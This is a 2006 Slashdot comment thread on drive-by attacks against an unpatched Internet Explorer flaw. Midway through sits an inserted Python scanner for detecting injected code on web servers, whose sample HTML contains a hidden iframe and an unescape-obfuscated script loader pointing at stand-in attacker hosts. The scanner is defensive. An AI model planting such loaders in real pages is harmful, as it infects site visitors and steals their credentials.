Web Site Attacks Against Unpatched IE Flaw Spike
Posted by Zonk on Mon Mar 27, 2006 01:29 PM from the not-a-good-spike dept.
An anonymous reader wrote to mention a Washingtonpost.com article about an increase in attacks against IE users via a critical, unpatched flaw. The bug allows software to be downloaded to the vulnerable PC even if the only act the user takes is browsing to a web site. From the article: "[A] password-stealing program landed on the Windows PC belonging to Reaz Chowdhury, a programmer for Oracle Corp. who works out of his home in Orlando, Fla. Chowdhury said he's not sure which site he browsed in the past 24 hours that hijacked his browser, but he confirmed that the attackers had logged the user name and password for his company's virtual private network (VPN)."
Related Stories
Technology: Trojan Exploits Unpatched IE Flaw 177 comments
onebuttonmouse writes "The Register reports on a trojan spotted in the wild that takes advantage of the so-far unpatched IE vulnerability mentioned on Slashdot earlier this week. From the article: 'The release of a Trojan that exploits an unpatched IE hole has prompted speculation that Microsoft may release an emergency out-of-cycle security patch. Delf-DH downloads other malware onto infected machines changing settings in order to monitor user activity and redirect surfers onto porn sites. The attack relies on a flaw in the way IE handles requests to the window() object.'"
Let's say it together: (Score:5, Insightful)
Patch released! (Score:5, Funny)
http://www.mozilla.com/firefox/ [mozilla.com]
Legislation Needed? (Score:5, Insightful)
I worked at an air force base and they were definitely standardized on IE. Knowing about these bugs and electing _not_ to fix them expediently, couldn't this be considered a threat to national security?
If there are over 160 million+ computers in the US alone, and 90% of those PCs use Internet Explorer, how can the US Gov. not justify action in insisting these issues be resolved promptly?
Jim http://www.runfatboy.net/ [runfatboy.net] -- Exercise for Web 2.0
Re:Legislation Needed? (Score:5, Interesting)
Re:Legislation Needed? (Score:3, Insightful)
Re:Legislation Needed? (Score:3, Insightful)
> Internet Explorer, how can the US Gov. not justify action in insisting these issues
> be resolved promptly?
No, how about secure sites take responsibility for their own incompetence. Both Windows and IE are licensed (and on large sites it really is a license and not a sale) on a general disclaimer of all warranties for suitability to purpose, security, etc. Add in a decade-long record of having more remote exploit
Re:Legislation Needed? (Score:4, Interesting)
This means that in closed source, the developers are the "lawyers" who proof-read the "contract". Though agreeing to a secret contract may not be the best idea (not like I've read the Linux/BSD/* source), that is another issue.
This means that we have to trust the developers' judgement. In this case, we have to trust that the developers will fix it as soon as possible. If that is legislated then rushing may occur to meet deadlines, possibly leading to more bugs.
I think we should hold companies responsible for errors, where a EULA cannot absolve them from the responsibility to provide the services that they promised at the time of purchase, let alone any loss/theft of data. If managers had to factor in the "cost of bugs" then I suspect developers would be given more time/resources to fix problems.
That's why I stay with #2 or #3 (Score:5, Interesting)
Not really (Score:3, Informative)
In fact, if MS is successful in creating an OS and set of apps that are more secure than the others, it will mean that Linux, BSD, Mac, and
Re:That's why I stay with #2 or #3 (Score:3, Funny)
Re:That's why I stay with #2 or #3 (Score:3, Informative)
No, it's not just that people don't go after other browsers quite as much. Most of the time, only Internet Explorer has known highly critical security flaws. From this chart [wikipedia.org] you can see that IE for Windows has had a known highly critical vulnerability for over two years. Currently, the only other browser that has such a serious flaw is Mozilla, and that's been for less than two months — and that
Now that's a solution! (Score:4, Insightful)
Sure I could guess but which ones exactly would those be?
Re:Now that's a solution! (Score:3, Funny)
"... said he's not sure which site he browsed..." (Score:5, Funny)
nope (Score:2)
So, it wasn't pr0n. But c'mon, couldn't he check the history and let others know?
Re:nope (Score:5, Funny)
Re:"... said he's not sure which site he browsed.. (Score:3, Interesting)
I'm surprised that a programmer would not have the common sense to disable active scripting for the internet at large, and only enable ActiveX and scripting for Trusted Sites.
And obviously you don't put porn in Trusted Sites.
As much as I hate to defend MS (MS Word makes me so incredibly angry), it seems that a lot of problems with IE are really a result of users who don't take the time to secure it in the options. Sure it
Re:"... said he's not sure which site he browsed.. (Score:5, Insightful)
Hrm, don't blame the victim. Sure, you can turn off active scripting (mainly JavaScript), but do you know how many sites fail to function properly without it? And that is only going to get worse with the rush to have more interactivity on the client. Think of all the hype around AJAX.
Nah, scripting in browsers (JavaScript, ActiveX, Flash, Shockwave, etc.) should be properly sandboxed so that they can't access system resources like the file system and execute commands. The problem lies with how IE is developed, not with a user, regardless of their knowledge level.
*sigh* (Score:2)
I have probably made over $1000 in the past year in $35.00 increments just running Ad-Aware, HijackThis and Spybot for people around town, and then recommending Firefox. Probably 10 times that amount for my commercial clients.
I used to run them on my box all the time, until I put firefox on... now I run them once a month or so - mainly for giggles and a healthy dose of paranoia. Clean.
When will they learn?
Re:*sigh* (Score:2, Informative)
Also, as a part-time webadmin, I noticed that firefox displays things differently from IE.
Since over 90% of visitors use IE, I have to design the site for IE.
So why don't they program firefox to render pages the same way IE does it?
Re:*sigh* (Score:3, Funny)
I'm just flabbergasted at the thought that I'm not even sure where to begin on a reply. What you are asking...is basically asking them to...break...firefox. I'm all for demolition and breaking stuff just as much as the next guy but that's usually in the name of progress and I see little "progress" in such a proposal.
As lame and well-used as it is: what you're proposing is for the Firefox developers to jump off a bridge just because
Re:*sigh* (Score:5, Informative)
4 + 2 * 6 evaluates left to right for the basic view, giving the answer 36. The advanced (scientific) view does it by algebraic hierarchy, so the multiplication is done first, giving 16.
(FWIW, the OS X calculator does it the algebraic way, but the calculator widget does it the left to right way)
Re:*sigh* (Score:4, Interesting)
wow.
you'd think that clicking something under the VIEW menu would, you know, change what you can see. Rather than changing the basic way in which the calculator works.
I still can't believe this.
"Hello, Microsoft Support"
"yeah, I've got a problem with the calculator"
"ok"
"yeah, sometimes when I type an equation in, it gives me one answer, but other times it gives me a different answer"
"oh yes, that's right sir, the calculator gives you different answers depending on which buttons you can see on the screen...."
In other news... (Score:5, Insightful)
Here we go again.... (Score:4, Informative)
Over on the linux, and alternative browser side, where I live, I see patches coming out very quickly for any kind of exploit.
Sadly, the patch for the new IE flaw is scheduled for April 11th? This is according to a BBC report here:
http://news.bbc.co.uk/2/hi/technology/4849904.stm [bbc.co.uk]
Can't they do better than that? How about an emergency patch, followed by a fully tested one? Just something to knock the vulnerability into non-functional status? Hey, it's fine if the patch is imperfect- I'll beta test to save my banking information. Really.
I suppose I wouldn't have a problem with Microsoft's monopoly if they actually service me as a customer well enough that they deserved a monopoly position. I like a lot of their software. But these kinds of security issues need to be addressed better and faster.
Ironically, I pay a lot less for my linux servers and get better responses for both support and patches. That makes a difference to me.
Serious Question (not flamebait) (Score:3, Interesting)
If the goal is to infect the most systems, then by default, you'd avoid Mozilla or Konqueror simply because (at best) you could only hope to control a fraction of machines with active internet connections. Maybe this question has been asked before...
Re:Serious Question (not flamebait) (Score:3, Insightful)
What's the general opinion? If the majority of casual surfers used Firefox or other alternative, would reverse engineers switch focus to those apps?
What makes you think the majority don't focus on alternative browsers now? From what I've seen there are about as many people pounding on Firefox as there are on IE. It's just the people who find things in Firefox usually get them fixed much more quickly. Of course if Firefox gains in market share more people will look for holes, but that does not mean it wi
Will IE in Vista be in managed code? (Score:4, Interesting)
Not Helpful In Terms of Security (Score:3, Interesting)
Was the City of Tuttle, Oklahoma... (Score:5, Funny)
Keep an eye on this one.. (Score:5, Informative)
This is a little like the WMF flaw [microsoft.com] that became known just after Christmas. Eventually MS had to provide an out-of-cycle patch (even if it was just a few days early) because of the bad press they were getting. From the looks of things, the patch for this one will be ready soon too.. so any kind of noise you can make to get an early release would be a Good Thing.
Yeah yeah, MS will get a lot of flak from Slashdotters on this, but you should bear in mind that they also provide some decent patching tools like WSUS [microsoft.com] for administrators to roll these things out. Personally, I never use IE on my Windows box, but I'm afraid it's still a fact of life in most large businesses.
Windows is more secure. (Score:2, Insightful)
But this is what we are talking about when we say LESS secure. Anyone running a server in a professional environment is expected to know what he or she is doing. What Windows lacks in security has to do with workstations/personal computers at a person's home browsing the web on IE, who is not a security expert and shouldn't need to be! Windows continues t
IE7 beta2 is the solution? Not for 2K users (Score:3, Insightful)
That's nice. Now when is Microsoft going to code IE7 to work on the hundreds of thousands (millions?) of pcs still running Windows 2000?
They're not? You mean I have to shell out more money to get a fix for a problem which is caused by their product?
Just another reason not to go with Vista. Another Mac convert on the way.
easy fix in XP (Score:3, Interesting)
What webserver software is getting commandeered? (Score:5, Insightful)
So, WHAT WEBSERVERS are being hacked into to do this? IIS? Apache 1.3? Apache 2? Windows only? Linux only? Something else? All of the above?
I don't ever use IE for anything, but I do run many websites with a variety of platforms and server software. I'd love to know what it is I'm supposed to be looking for on my servers...
Re:What webserver software is getting commandeered (Score:3, Insightful)
I think it's any webservers whose webmasters use IE. Lemme explain:
1) a dumb webmaster has his PW for his webspace stored in windows
2) dumb webmaster (who should know better) visits a site while using IE, and the site steals his password
3) script or person uses the password to login to the webspace, add in malicious code, and the cycle continues
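The question a few posts up (what a web admin should actually be looking for on the server side) and the chain just described (stolen FTP password, injected code, repeat) both come down to the same check: does any page in the web root now carry content that a visitor is not meant to see but IE will happily load? The scanner below is an added example written for this page; it is not code from the article, from Slashdot or from any poster. It looks for the three signs the thread and the Washington Post quote describe: hidden or zero-size iframes, script tags that pull from hosts you don't control, and `document.write(unescape(...))`-style obfuscation, which it decodes and rescans. The allow-list hosts, the sample HTML and the attacker hostnames are constructed for the example; the exploit itself is not reproduced, only the loader pattern.

```python
"""Heuristic scan of a web root for drive-by injection: hidden iframes, external
script loaders and unescape()-obfuscated payloads. Hits need a human look."""
import os
import re
import sys
from urllib.parse import unquote, urlparse

# Assumption: hosts you legitimately serve script from. Anything else is "external".
ALLOWED_HOSTS = {"www.example.com", "example.com"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
OBFUSCATION_RE = re.compile(r"\bunescape\s*\(|fromCharCode\s*\(|\beval\s*\(", re.I)
STYLE_RE = re.compile(r"\bstyle\s*=\s*['\"]([^'\"]*)['\"]", re.I)

# Constructed sample: a legitimate page after an attacker with the site's FTP
# password appended a 0x0 iframe and an escaped script loader. Hosts are made up.
SAMPLE_HTML = """<html><body>
<h1>Acme Widgets</h1>
<script src="/js/menu.js"></script>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://evil.example/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""
CLEAN_HTML = '<html><body><h1>Acme Widgets</h1><script src="/js/menu.js"></script></body></html>'


def iframe_is_hidden(tag):
    """Zero/one-pixel or CSS-hidden frames: the visitor never sees them, which is the point."""
    for name in ("width", "height"):
        m = re.search(rf"\b{name}\s*=\s*['\"]?(\d+)", tag, re.I)
        if m and int(m.group(1)) <= 1:
            return True
    style = STYLE_RE.search(tag)
    return bool(style and re.search(r"visibility\s*:\s*hidden|display\s*:\s*none",
                                    style.group(1), re.I))


def external_host(url, allowed_hosts):
    """Host of an absolute http(s) URL that is not on the allow list, else None."""
    p = urlparse(url.strip())
    if p.scheme.lower() in ("http", "https") and p.hostname and p.hostname.lower() not in allowed_hosts:
        return p.hostname.lower()
    return None


def scan_html(html, allowed_hosts):
    """Return a list of (kind, detail) findings for one document."""
    findings = []
    for tag in IFRAME_RE.findall(html):
        m = SRC_RE.search(tag)
        src = m.group(1) if m else ""
        if iframe_is_hidden(tag):
            findings.append(("hidden-iframe", src))
        elif external_host(src, allowed_hosts):
            findings.append(("external-iframe", src))
    for src in SCRIPT_SRC_RE.findall(html):
        if external_host(src, allowed_hosts):
            findings.append(("external-script", src))
    for body in INLINE_SCRIPT_RE.findall(html):
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscated-script", body.strip()[:60]))
            # Decode %XX escapes and look again: the payload is usually another script tag.
            for src in SCRIPT_SRC_RE.findall(unquote(body)):
                if external_host(src, allowed_hosts):
                    findings.append(("external-script", src))
    return findings


def scan_tree(root, allowed_hosts, exts=(".html", ".htm", ".php", ".asp", ".aspx")):
    """Walk a web root; return {path: findings} for files that have any."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read(), allowed_hosts)
                if found:
                    report[path] = found
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, found in scan_tree(sys.argv[1], ALLOWED_HOSTS).items():
            print(path)
            for f in found:
                print("   ", f)
    else:
        for f in scan_html(SAMPLE_HTML, ALLOWED_HOSTS):
            print(f)
```

Run it as `python scan.py /var/www` and diff the report against a run from a known-good backup; an injected loader shows up as a new `hidden-iframe` or `external-script` hit on a page nobody edited. The regexes are deliberately loose (attackers vary case, quoting and whitespace), so expect the occasional false positive on legitimate third-party widgets and add those hosts to the allow list rather than loosening the checks.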
And the bottom line is ... (Score:3, Funny)
BEATS HEAD SLOWLY AGAINST BRICK WALL.
THIS IS UNSATISFACTORY.
GOES OUT AND FINDS granite WALL.
BEATS HEAD AGAINST IT.
MUCH BETTER!
Re:linking=vouching for (Score:2, Insightful)
Re:linking=vouching for (Score:5, Informative)
More than 200 Web sites -- many of them belonging to legitimate businesses -- have been hacked and seeded with code that tries to take advantage of an unpatched security hole in Microsoft's Internet Explorer Web browser to install hostile code on Windows computers when users merely visit the sites.
Re:linking=vouching for (Score:2)
So how do these sites get hits? Are they Good sites that have just been compromised?
The most common scenario right now is a server is hacked, then e-mails and IMs are sent out with links to it. I don't know of any really popular sites that have been hacked to include this.
Re:Ugh (Score:3, Funny)
Ugh (Score:5, Funny)
Re:Ugh (Score:5, Funny)
Re:Ugh (Score:5, Funny)
Re:Ugh (Score:3, Funny)
Godwin explodes. Details at 11.
~W
Re:Ugh (Score:5, Informative)
"Website Attacks Against Unpatched IE Flaw Spike"
Actually, this would be even clearer if you put the verb before the prepositional phrase:
"Website Attacks Spike Against Unpatched IE Flaw"
It's unclear because both "spike" and "flaw" can be verbs or nouns, and the broken "unpatch" disrupts our ability to smoothly interpret the rest of the sentence thanks to turning an adjective into a present tense verb.
(I know I'm not perfect by a long shot on spelling and grammar, but it's not my job to post legibly on Slashdot.)
Re:Ugh (Score:2)
Re:Yep... (Score:2)
Re:This is becomming not funny (Score:3, Funny)
Re:a programmer for Oracle Corp (Score:3, Funny)
I doubt he talked to his boss before blabbing that one.